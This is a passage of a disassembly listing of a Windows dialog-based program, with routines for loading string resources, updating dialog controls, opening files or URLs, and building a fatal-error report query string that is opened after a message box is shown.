mov [esp+3Ch+var_14], ecx
push edi
push eax
mov ecx, esi
mov [esp+44h+var_1C], eax
mov [esp+44h+var_18], edi
mov [esp+44h+var_10], edx
call dword ptr [ebp+0]
test eax, eax
mov ecx, [esp+2Ch+arg_4]
mov [esi+18h], ecx
jz short loc_404F90
cmp edi, 39h
ja short loc_404F4A
jz short loc_404F82
cmp edi, 2Eh
jb short loc_404F62
cmp edi, 2Fh
jbe short loc_404F82
cmp edi, 37h
jz short loc_404F82
jmp short loc_404F62
; ---------------------------------------------------------------------------
loc_404F4A: ; CODE XREF: sub_404ED0+65�j
cmp edi, 110h
jz short loc_404F82
cmp edi, 131h
jbe short loc_404F62
cmp edi, 138h
jbe short loc_404F82
loc_404F62: ; CODE XREF: sub_404ED0+6C�j
; sub_404ED0+78�j ...
mov edx, [esp+2Ch+dwNewLong]
mov eax, [esi+4]
push edx ; dwNewLong
push 0 ; nIndex
push eax ; hWnd
call ds:SetWindowLongA ; SetWindowLongA
pop edi
pop esi
pop ebp
mov eax, 1
pop ebx
add esp, 1Ch
retn 10h
; ---------------------------------------------------------------------------
loc_404F82: ; CODE XREF: sub_404ED0+67�j
; sub_404ED0+71�j ...
mov eax, [esp+2Ch+dwNewLong]
pop edi
pop esi
pop ebp
pop ebx
add esp, 1Ch
retn 10h
; ---------------------------------------------------------------------------
loc_404F90: ; CODE XREF: sub_404ED0+60�j
cmp edi, 82h
jnz short loc_404FAA
mov eax, [esi+4]
mov edx, [esi]
push eax
mov ecx, esi
mov dword ptr [esi+4], 0
call dword ptr [edx+8]
loc_404FAA: ; CODE XREF: sub_404ED0+C6�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
add esp, 1Ch
retn 10h
sub_404ED0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_404FC0(int nIDDlgItem,UINT Msg,WPARAM wParam,LPARAM lParam)
sub_404FC0 proc near ; CODE XREF: sub_405C90+7D7�p
nIDDlgItem = dword ptr 4
Msg = dword ptr 8
wParam = dword ptr 0Ch
lParam = dword ptr 10h
mov eax, [esp+nIDDlgItem]
mov ecx, [ecx+4]
push eax ; nIDDlgItem
push ecx ; hDlg
call ds:GetDlgItem ; GetDlgItem
test eax, eax
jnz short loc_404FD6
retn 10h
; ---------------------------------------------------------------------------
loc_404FD6: ; CODE XREF: sub_404FC0+11�j
mov edx, [esp+lParam]
mov ecx, [esp+wParam]
push edx ; lParam
mov edx, [esp+4+Msg]
push ecx ; wParam
push edx ; Msg
push eax ; hWnd
call ds:PostMessageA ; PostMessageA
retn 10h
sub_404FC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_404FF0(LPCSTR lpFile)
sub_404FF0 proc near ; CODE XREF: sub_405020+AB�p
; sub_4051A0+33E�p ...
lpFile = dword ptr 4
mov eax, [esp+lpFile]
push 1 ; nShowCmd
push 0 ; lpDirectory
push 0 ; lpParameters
push eax ; lpFile
push offset Operation ; "open"
push 0 ; hwnd
call ds:ShellExecuteA ; ShellExecuteA
cmp eax, 20h
setnbe al
retn 4
sub_404FF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_405020(UINT uID)
sub_405020 proc near ; CODE XREF: sub_405C90+1B7�p
; sub_405C90+1EF�p ...
String = byte ptr -230h
bstrString = dword ptr -30h
lpMem = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_6 = byte ptr -6
var_4 = dword ptr -4
uID = dword ptr 8
push ebp
mov ebp, esp
sub esp, 230h
mov edx, [ebp+uID]
push ebx
push esi
mov esi, ecx
push edi
lea ecx, [ebp+String]
mov eax, [esi+1Ch]
push 200h ; cchBufferMax
push ecx ; lpBuffer
xor ebx, ebx
push edx ; uID
push eax ; hInstance
mov [ebp+var_4], esi
mov [ebp+bstrString], ebx
mov [ebp+lpMem], ebx
mov [ebp+var_28], ebx
mov [ebp+var_24], bl
mov [ebp+var_6], bl
call ds:LoadStringA ; LoadStringA
mov edi, eax
mov eax, [ebp+bstrString]
push eax ; bstrString
call ds:SysFreeString
cmp edi, ebx
jz loc_405102
lea ecx, [ebp+String]
test ecx, ecx
jnz short loc_40507E
xor edi, edi
jmp short loc_4050B6
; ---------------------------------------------------------------------------
loc_40507E: ; CODE XREF: sub_405020+58�j
lea edx, [ebp+String]
push edx ; lpString
call ds:lstrlenA ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov edi, esp
push esi ; cchWideChar
push edi ; lpWideCharStr
lea eax, [ebp+String]
push 0FFFFFFFFh ; cbMultiByte
push eax ; lpMultiByteStr
push ebx ; dwFlags
push ebx ; CodePage
mov [edi], bx
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov esi, [ebp+var_4]
loc_4050B6: ; CODE XREF: sub_405020+5C�j
push edi ; psz
call ds:SysAllocString
lea ecx, [ebp+bstrString]
mov [ebp+bstrString], eax
call sub_40A2D0
push eax ; lpFile
mov ecx, esi
call sub_404FF0
mov byte ptr [ebp+uID+3], al
mov eax, [ebp+lpMem]
cmp eax, ebx
jz short loc_4050E6
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [ebp+lpMem], ebx
loc_4050E6: ; CODE XREF: sub_405020+B8�j
mov edx, [ebp+bstrString]
push edx ; bstrString
call ds:SysFreeString
mov al, byte ptr [ebp+uID+3]
lea esp, [ebp-23Ch]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_405102: ; CODE XREF: sub_405020+4A�j
mov eax, [ebp+lpMem]
mov [ebp+bstrString], ebx
cmp eax, ebx
jz short loc_405118
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [ebp+lpMem], ebx
loc_405118: ; CODE XREF: sub_405020+EA�j
mov ecx, [ebp+bstrString]
push ecx ; bstrString
call ds:SysFreeString
lea esp, [ebp-23Ch]
xor al, al
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_405020 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_405140 proc near ; CODE XREF: sub_406670+16�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
xor edx, edx
mov eax, offset dword_40D720
loc_40514C: ; CODE XREF: sub_405140+19�j
cmp [eax], esi
jz short loc_405167
add eax, 8
inc edx
cmp eax, offset off_40D810
jl short loc_40514C
mov [ecx+50h], esi
mov eax, 12Bh
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_405167: ; CODE XREF: sub_405140+E�j
mov eax, ds:dword_40D724[edx*8]
pop esi
retn 4
sub_405140 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_405180 proc near ; CODE XREF: sub_4051A0+345�p
; sub_405C90+30�p ...
mov eax, [ecx+4]
push eax ; hWnd
call ds:DestroyWindow ; DestroyWindow
push 0 ; nExitCode
call ds:PostQuitMessage ; PostQuitMessage
retn
sub_405180 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4051A0(int,LPCSTR lpMem,LPCWSTR lpString,int,UINT uID,char arglist)
sub_4051A0 proc near ; CODE XREF: sub_405C90+4E6�p
Text = byte ptr -630h
String = byte ptr -230h
var_30 = dword ptr -30h
bstrString = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_2 = byte ptr -2
arg_0 = dword ptr 8
lpMem = dword ptr 0Ch
lpString = dword ptr 10h
arg_C = dword ptr 14h
uID = dword ptr 18h
arglist = byte ptr 1Ch
push ebp
mov ebp, esp
sub esp, 630h
mov eax, [ebp+arg_0]
mov edx, [ebp+uID]
push ebx
push esi
mov eax, [eax+1Ch]
push edi
lea ecx, [ebp+String]
push 200h ; cchBufferMax
push ecx ; lpBuffer
xor ebx, ebx
push edx ; uID
push eax ; hInstance
mov [ebp+bstrString], ebx
mov [ebp+var_28], ebx
mov [ebp+var_24], ebx
mov [ebp+var_20], bl
mov [ebp+var_2], bl
call ds:LoadStringA ; LoadStringA
mov edi, ds:SysFreeString
mov esi, eax
mov eax, [ebp+bstrString]
push eax ; bstrString
call edi ; SysFreeString
cmp esi, ebx
mov ebx, ds:lstrlenA
jz short loc_405253
lea ecx, [ebp+String]
test ecx, ecx
jnz short loc_40520A
xor eax, eax
push eax ; psz
call ds:SysAllocString
mov [ebp+bstrString], eax
jmp short loc_40525A
; ---------------------------------------------------------------------------
loc_40520A: ; CODE XREF: sub_4051A0+5A�j
lea edx, [ebp+String]
push edx ; lpString
call ebx ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov edi, esp
push esi ; cchWideChar
push edi ; lpWideCharStr
lea eax, [ebp+String]
push 0FFFFFFFFh ; cbMultiByte
push eax ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
mov word ptr [edi], 0
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov eax, edi
mov edi, ds:SysFreeString
push eax ; psz
call ds:SysAllocString
mov [ebp+bstrString], eax
jmp short loc_40525A
; ---------------------------------------------------------------------------
loc_405253: ; CODE XREF: sub_4051A0+50�j
mov [ebp+bstrString], 0
loc_40525A: ; CODE XREF: sub_4051A0+68�j
; sub_4051A0+B1�j
lea ecx, [ebp+arglist]
push ecx ; arglist
lea ecx, [ebp+bstrString]
call sub_40A2D0
lea edx, [ebp+Text]
push eax ; LPCSTR
push edx ; LPSTR
call ds:wvsprintfA ; wvsprintfA
mov esi, [ebp+arg_0]
lea ecx, [ebp+String]
push 200h ; cchBufferMax
push ecx ; lpBuffer
mov eax, [esi+1Ch]
push 1FAh ; uID
push eax ; hInstance
call ds:LoadStringA ; LoadStringA
mov edx, [ebp+bstrString]
mov [ebp+var_30], eax
push edx ; bstrString
call edi ; SysFreeString
mov ecx, [ebp+var_30]
xor eax, eax
cmp ecx, eax
jz short loc_4052F5
lea ecx, [ebp+String]
test ecx, ecx
jz short loc_4052EE
lea edx, [ebp+String]
push edx ; lpString
call ebx ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov edi, esp
push esi ; cchWideChar
push edi ; lpWideCharStr
lea eax, [ebp+String]
push 0FFFFFFFFh ; cbMultiByte
push eax ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
mov word ptr [edi], 0
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov esi, [ebp+arg_0]
mov eax, edi
mov edi, ds:SysFreeString
loc_4052EE: ; CODE XREF: sub_4051A0+10C�j
push eax ; psz
call ds:SysAllocString
loc_4052F5: ; CODE XREF: sub_4051A0+102�j
lea ecx, [ebp+bstrString]
mov [ebp+bstrString], eax
call sub_40A2D0
mov edx, [esi+4]
push 10h ; uType
lea ecx, [ebp+Text]
push eax ; lpCaption
push ecx ; lpText
push edx ; hWnd
call ds:MessageBoxA ; MessageBoxA
mov eax, [ebp+bstrString]
push eax ; bstrString
call edi ; SysFreeString
mov esi, [esi+1Ch]
lea ecx, [ebp+String]
push 200h ; cchBufferMax
push ecx ; lpBuffer
push 74h ; uID
push esi ; hInstance
mov [ebp+bstrString], 0
call ds:LoadStringA ; LoadStringA
mov edx, [ebp+bstrString]
mov esi, eax
push edx ; bstrString
call edi ; SysFreeString
xor eax, eax
cmp esi, eax
jz short loc_405383
lea ecx, [ebp+String]
test ecx, ecx
jz short loc_40537C
lea edx, [ebp+String]
push edx ; lpString
call ebx ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov eax, esp
push 0 ; CodePage
lea ecx, [ebp+String]
push esi ; cchWideChar
push ecx ; lpMultiByteStr
push eax ; lpWideCharStr
call sub_401560
loc_40537C: ; CODE XREF: sub_4051A0+1AF�j
push eax ; psz
call ds:SysAllocString
loc_405383: ; CODE XREF: sub_4051A0+1A5�j
push 3Fh
lea ecx, [ebp+bstrString]
mov [ebp+bstrString], eax
call sub_40A2D0
push eax
call sub_40B1B0
add esp, 8
mov edi, offset String ; "?"
test eax, eax
jz short loc_4053A7
mov edi, offset asc_40F3F8 ; "&"
loc_4053A7: ; CODE XREF: sub_4051A0+200�j
test edi, edi
jnz short loc_4053AF
xor esi, esi
jmp short loc_4053D0
; ---------------------------------------------------------------------------
loc_4053AF: ; CODE XREF: sub_4051A0+209�j
push edi ; lpString
call ebx ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov eax, esp
push 0 ; CodePage
push esi ; cchWideChar
push edi ; lpMultiByteStr
push eax ; lpWideCharStr
call sub_401560
mov esi, eax
loc_4053D0: ; CODE XREF: sub_4051A0+20D�j
mov edi, ds:lstrlenW
push esi ; lpString
call edi ; lstrlenW
push eax
push esi
lea ecx, [ebp+bstrString]
call sub_403920
mov edx, offset aErrorFatalFile ; "error=fatal&filename="
test edx, edx
jnz short loc_4053F0
xor esi, esi
jmp short loc_405419
; ---------------------------------------------------------------------------
loc_4053F0: ; CODE XREF: sub_4051A0+24A�j
push offset aErrorFatalFile ; "error=fatal&filename="
call ebx ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov eax, esp
push 0 ; CodePage
push esi ; cchWideChar
push offset aErrorFatalFile ; "error=fatal&filename="
push eax ; lpWideCharStr
call sub_401560
mov esi, eax
loc_405419: ; CODE XREF: sub_4051A0+24E�j
push esi ; lpString
call edi ; lstrlenW
push eax
push esi
lea ecx, [ebp+bstrString]
call sub_403920
mov eax, [ebp+lpMem]
lea ecx, [ebp+bstrString]
push eax ; lpMem
call sub_40AA70
mov ecx, offset aLinenumber ; "&linenumber="
test ecx, ecx
jnz short loc_40543F
xor esi, esi
jmp short loc_405468
; ---------------------------------------------------------------------------
loc_40543F: ; CODE XREF: sub_4051A0+299�j
push offset aLinenumber ; "&linenumber="
call ebx ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov eax, esp
push 0 ; CodePage
push esi ; cchWideChar
push offset aLinenumber ; "&linenumber="
push eax ; lpWideCharStr
call sub_401560
mov esi, eax
loc_405468: ; CODE XREF: sub_4051A0+29D�j
push esi ; lpString
call edi ; lstrlenW
push eax
push esi
lea ecx, [ebp+bstrString]
call sub_403920
mov edx, [ebp+lpString]
lea ecx, [ebp+bstrString]
push edx ; lpString
call sub_40A980
mov eax, offset aLasterror ; "&lasterror="
test eax, eax
jnz short loc_40548E
xor esi, esi
jmp short loc_4054B7
; ---------------------------------------------------------------------------
loc_40548E: ; CODE XREF: sub_4051A0+2E8�j
push offset aLasterror ; "&lasterror="
call ebx ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov eax, esp
push 0 ; CodePage
push esi ; cchWideChar
push offset aLasterror ; "&lasterror="
push eax ; lpWideCharStr
call sub_401560
mov esi, eax
loc_4054B7: ; CODE XREF: sub_4051A0+2EC�j
push esi ; lpString
call edi ; lstrlenW
push eax
push esi
lea ecx, [ebp+bstrString]
call sub_403920
mov ecx, [ebp+arg_C]
push ecx ; lpString
lea ecx, [ebp+bstrString]
call sub_40A980
lea ecx, [ebp+bstrString]
call sub_40A2D0
mov esi, [ebp+arg_0]
push eax ; lpFile
mov ecx, esi
call sub_404FF0
mov ecx, esi
call sub_405180
lea ecx, [ebp+bstrString]
call sub_4042F0
lea esp, [ebp-63Ch]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4051A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_405500(LPCSTR lParam)
sub_405500 proc near ; CODE XREF: sub_4055A0+90�p
; sub_405640+2A�p
lParam = dword ptr 4
mov eax, dword_40FBD4
push ebx
push esi
mov esi, ecx
test eax, eax
jnz short loc_405522
push 1400h ; dwBytes
call sub_40AF50
mov dword_40FBD4, eax
add esp, 4
mov byte ptr [eax], 0
loc_405522: ; CODE XREF: sub_405500+B�j
mov eax, dword_40FBD4
mov ebx, [esp+8+lParam]
push eax ; lpString2
push ebx ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jz short loc_40558D
mov ecx, [esi+4]
push edi
mov edi, ds:SendDlgItemMessageA
push ebx ; lParam
push 0 ; wParam
push 180h ; Msg
push 0CCh ; nIDDlgItem
push ecx ; hDlg
call edi ; SendDlgItemMessageA
mov edx, [esi+4]
push 0 ; lParam
push 0 ; wParam
push 18Bh ; Msg
push 0CCh ; nIDDlgItem
push edx ; hDlg
call edi ; SendDlgItemMessageA
dec eax
push 0 ; lParam
push eax ; wParam
mov eax, [esi+4]
push 186h ; Msg
push 0CCh ; nIDDlgItem
push eax ; hDlg
call edi ; SendDlgItemMessageA
mov ecx, dword_40FBD4
push 1400h ; iMaxLength
push ebx ; lpString2
push ecx ; lpString1
call ds:lstrcpynA ; lstrcpynA
pop edi
loc_40558D: ; CODE XREF: sub_405500+35�j
pop esi
pop ebx
retn 4
sub_405500 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_4055A0(int,UINT uID,char arglist)
sub_4055A0 proc near ; CODE XREF: sub_406670+1D�p
; sub_406720+A2�p ...
Buffer = byte ptr -800h
lParam = byte ptr -400h
arg_0 = dword ptr 4
uID = dword ptr 8
arglist = byte ptr 0Ch
mov ecx, [esp+uID]
sub esp, 800h
lea eax, [esp+800h+Buffer]
push esi
mov esi, [esp+804h+arg_0]
push 400h ; cchBufferMax
push eax ; lpBuffer
mov edx, [esi+1Ch]
push ecx ; uID
push edx ; hInstance
call ds:LoadStringA ; LoadStringA
test eax, eax
mov eax, [esp+804h+uID]
jnz short loc_4055E8
push eax
lea ecx, [esp+808h+Buffer]
push offset aResourceLdNotF ; "resource %ld not found"
push ecx ; LPSTR
call ds:wsprintfA ; wsprintfA
add esp, 0Ch
jmp short loc_405626
; ---------------------------------------------------------------------------
loc_4055E8: ; CODE XREF: sub_4055A0+30�j
cmp eax, 12Bh
jnz short loc_40560B
mov edx, [esi+50h]
lea eax, [esp+804h+Buffer]
push edx
lea ecx, [esp+808h+lParam]
push eax ; LPCSTR
push ecx ; LPSTR
call ds:wsprintfA ; wsprintfA
add esp, 0Ch
jmp short loc_405626
; ---------------------------------------------------------------------------
loc_40560B: ; CODE XREF: sub_4055A0+4D�j
lea edx, [esp+804h+arglist]
lea eax, [esp+804h+Buffer]
push edx ; arglist
lea ecx, [esp+808h+lParam]
push eax ; LPCSTR
push ecx ; LPSTR
call ds:wvsprintfA ; wvsprintfA
loc_405626: ; CODE XREF: sub_4055A0+46�j
; sub_4055A0+69�j
lea edx, [esp+804h+lParam]
mov ecx, esi
push edx ; lParam
call sub_405500
pop esi
add esp, 800h
retn
sub_4055A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_405640(int,LPCSTR,char arglist)
sub_405640 proc near ; CODE XREF: sub_406670+61�p
; sub_406720+1E9�p ...
lParam = byte ptr -400h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arglist = byte ptr 0Ch
mov ecx, [esp+arg_4]
sub esp, 400h
lea eax, [esp+400h+arglist]
lea edx, [esp+400h+lParam]
push eax ; arglist
push ecx ; LPCSTR
push edx ; LPSTR
call ds:wvsprintfA ; wvsprintfA
mov ecx, [esp+400h+arg_0]
lea eax, [esp+400h+lParam]
push eax ; lParam
call sub_405500
add esp, 400h
retn
sub_405640 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_405680(int nIDDlgItem,UINT uID)
sub_405680 proc near ; CODE XREF: sub_405C90+3DE�p
; sub_405C90+3EC�p ...
String = byte ptr -230h
bstrString = dword ptr -30h
lpMem = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_6 = byte ptr -6
var_4 = dword ptr -4
nIDDlgItem = dword ptr 8
uID = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 230h
mov edx, [ebp+uID]
push ebx
push esi
mov esi, ecx
push edi
lea ecx, [ebp+String]
mov eax, [esi+1Ch]
push 200h ; cchBufferMax
push ecx ; lpBuffer
xor ebx, ebx
push edx ; uID
push eax ; hInstance
mov [ebp+var_4], esi
mov [ebp+bstrString], ebx
mov [ebp+lpMem], ebx
mov [ebp+var_28], ebx
mov [ebp+var_24], bl
mov [ebp+var_6], bl
call ds:LoadStringA ; LoadStringA
mov edi, eax
mov eax, [ebp+bstrString]
push eax ; bstrString
call ds:SysFreeString
cmp edi, ebx
jz loc_40576D
lea ecx, [ebp+String]
test ecx, ecx
jnz short loc_4056DE
xor edi, edi
jmp short loc_405716
; ---------------------------------------------------------------------------
loc_4056DE: ; CODE XREF: sub_405680+58�j
lea edx, [ebp+String]
push edx ; lpString
call ds:lstrlenA ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov edi, esp
push esi ; cchWideChar
push edi ; lpWideCharStr
lea eax, [ebp+String]
push 0FFFFFFFFh ; cbMultiByte
push eax ; lpMultiByteStr
push ebx ; dwFlags
push ebx ; CodePage
mov [edi], bx
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov esi, [ebp+var_4]
loc_405716: ; CODE XREF: sub_405680+5C�j
push edi ; psz
call ds:SysAllocString
lea ecx, [ebp+bstrString]
mov [ebp+bstrString], eax
call sub_40A2D0
mov edx, [ebp+nIDDlgItem]
push eax ; lpString
mov eax, [esi+4]
push edx ; nIDDlgItem
push eax ; hDlg
call ds:SetDlgItemTextA ; SetDlgItemTextA
cmp eax, 1
mov eax, [ebp+lpMem]
setz byte ptr [ebp+uID+3]
cmp eax, ebx
jz short loc_405751
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [ebp+lpMem], ebx
loc_405751: ; CODE XREF: sub_405680+C3�j
mov ecx, [ebp+bstrString]
push ecx ; bstrString
call ds:SysFreeString
mov al, byte ptr [ebp+uID+3]
lea esp, [ebp-23Ch]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
loc_40576D: ; CODE XREF: sub_405680+4A�j
mov eax, [ebp+lpMem]
mov [ebp+bstrString], ebx
cmp eax, ebx
jz short loc_405783
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [ebp+lpMem], ebx
loc_405783: ; CODE XREF: sub_405680+F5�j
mov ecx, [ebp+bstrString]
push ecx ; bstrString
call ds:SysFreeString
lea esp, [ebp-23Ch]
xor al, al
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
sub_405680 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_4057A0(int nIDDlgItem,LPCSTR lpString)
sub_4057A0 proc near ; CODE XREF: sub_405C90+73C�p
nIDDlgItem = dword ptr 4
lpString = dword ptr 8
mov eax, [esp+lpString]
test eax, eax
jnz short loc_4057AD
xor al, al
retn 8
; ---------------------------------------------------------------------------
loc_4057AD: ; CODE XREF: sub_4057A0+6�j
mov ecx, [ecx+4]
push eax ; lpString
mov eax, [esp+4+nIDDlgItem]
push eax ; nIDDlgItem
push ecx ; hDlg
call ds:SetDlgItemTextA ; SetDlgItemTextA
cmp eax, 1
setz al
retn 8
sub_4057A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4057D0 proc near ; CODE XREF: sub_405830+11E�p
; sub_405830+13F�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push edi
mov edi, [esp+8+arg_0]
mov eax, [esi+1Ch]
push 79h ; uID
push eax ; hInstance
mov ecx, edi
call sub_409450
mov ecx, [esi+1Ch]
push 66h ; uID
push ecx ; hInstance
push 1 ; int
mov ecx, edi
call sub_4092D0
mov edx, [esi+1Ch]
push 67h ; uID
push edx ; hInstance
push 2 ; int
mov ecx, edi
call sub_4092D0
mov eax, [esi+1Ch]
push 68h ; uID
push eax ; hInstance
push 1 ; int
mov ecx, edi
call sub_409310
mov ecx, [esi+1Ch]
push 69h ; uID
push ecx ; hInstance
push 2 ; int
mov ecx, edi
call sub_409310
push 0
mov ecx, edi
call sub_409410
pop edi
pop esi
retn 4
sub_4057D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405830 proc near ; CODE XREF: sub_405C90+245�p
psz = byte ptr -28Ch
var_8C = dword ptr -8Ch
var_60 = dword ptr -60h
lpMem = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = byte ptr -54h
var_36 = byte ptr -36h
bstrString = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_A = byte ptr -0Ah
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 28Ch
push ebx
push esi
push edi
mov edi, ecx
lea ecx, [ebp+psz]
push 200h ; cchBufferMax
mov eax, [edi+1Ch]
push ecx ; lpBuffer
xor ebx, ebx
push 71h ; uID
push eax ; hInstance
mov [ebp+var_4], edi
mov [ebp+bstrString], ebx
mov [ebp+var_30], ebx
mov [ebp+var_2C], ebx
mov [ebp+var_28], bl
mov [ebp+var_A], bl
call ds:LoadStringA ; LoadStringA
mov edx, [ebp+bstrString]
mov esi, eax
push edx ; bstrString
call ds:SysFreeString
cmp esi, ebx
jz short loc_4058D6
lea eax, [ebp+psz]
test eax, eax
jnz short loc_405890
push eax ; psz
call ds:SysAllocString
mov [ebp+bstrString], eax
jmp short loc_4058D9
; ---------------------------------------------------------------------------
loc_405890: ; CODE XREF: sub_405830+52�j
lea ecx, [ebp+psz]
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov edi, esp
push esi ; cchWideChar
push edi ; lpWideCharStr
lea edx, [ebp+psz]
push 0FFFFFFFFh ; cbMultiByte
push edx ; lpMultiByteStr
push ebx ; dwFlags
push ebx ; CodePage
mov [edi], bx
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov eax, edi
mov edi, [ebp+var_4]
push eax ; psz
call ds:SysAllocString
mov [ebp+bstrString], eax
jmp short loc_4058D9
; ---------------------------------------------------------------------------
loc_4058D6: ; CODE XREF: sub_405830+48�j
mov [ebp+bstrString], ebx
loc_4058D9: ; CODE XREF: sub_405830+5E�j
; sub_405830+A4�j
mov eax, offset MultiByteStr ; "\\"
test eax, eax
jnz short loc_4058E6
xor esi, esi
jmp short loc_405912
; ---------------------------------------------------------------------------
loc_4058E6: ; CODE XREF: sub_405830+B0�j
push offset MultiByteStr ; "\\"
call ds:lstrlenA ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov eax, esp
push ebx ; CodePage
push esi ; cchWideChar
push offset MultiByteStr ; "\\"
push eax ; lpWideCharStr
call sub_401560
mov esi, eax
loc_405912: ; CODE XREF: sub_405830+B4�j
push esi ; lpString
call ds:lstrlenW ; lstrlenW
push eax
push esi
lea ecx, [ebp+bstrString]
call sub_403920
mov ecx, [edi+1Ch]
push 7Ah ; bstrString
push ecx ; hInstance
lea ecx, [ebp+bstrString]
call sub_40A840
lea ecx, [ebp+bstrString]
add edi, 20h
call sub_40A2D0
push eax ; phkResult
mov ecx, edi ; int
call sub_408FC0
test al, al
jnz short loc_405958
mov esi, [ebp+var_4]
push edi
mov ecx, esi
call sub_4057D0
jmp loc_405A75
; ---------------------------------------------------------------------------
loc_405958: ; CODE XREF: sub_405830+116�j
lea ecx, [ebp+var_8C] ; int
call sub_408BE0
mov esi, [ebp+var_4]
lea edx, [ebp+var_8C]
push edx
mov ecx, esi
call sub_4057D0
push edi
lea ecx, [ebp+var_8C]
call sub_408CC0
test al, al
jz loc_405A59
mov eax, [esi+1Ch]
lea ecx, [ebp+psz]
push 200h ; cchBufferMax
push ecx ; lpBuffer
push 72h ; uID
push eax ; hInstance
mov [ebp+var_60], ebx
mov [ebp+lpMem], ebx
mov [ebp+var_58], ebx
mov [ebp+var_54], bl
mov [ebp+var_36], bl
call ds:LoadStringA ; LoadStringA
mov edx, [ebp+var_60]
mov esi, eax
push edx ; bstrString
call ds:SysFreeString
cmp esi, ebx
jz short loc_405A1C
lea eax, [ebp+psz]
test eax, eax
jnz short loc_4059D5
push eax ; psz
call ds:SysAllocString
mov [ebp+var_60], eax
jmp short loc_405A1F
; ---------------------------------------------------------------------------
loc_4059D5: ; CODE XREF: sub_405830+197�j
lea ecx, [ebp+psz]
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov eax, esp
push esi ; cchWideChar
push eax ; lpWideCharStr
lea edx, [ebp+psz]
push 0FFFFFFFFh ; cbMultiByte
push edx ; lpMultiByteStr
push ebx ; dwFlags
push ebx ; CodePage
mov [ebp+var_8], eax
mov [eax], bx
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov eax, [ebp+var_8]
push eax ; psz
call ds:SysAllocString
mov [ebp+var_60], eax
jmp short loc_405A1F
; ---------------------------------------------------------------------------
loc_405A1C: ; CODE XREF: sub_405830+18D�j
mov [ebp+var_60], ebx
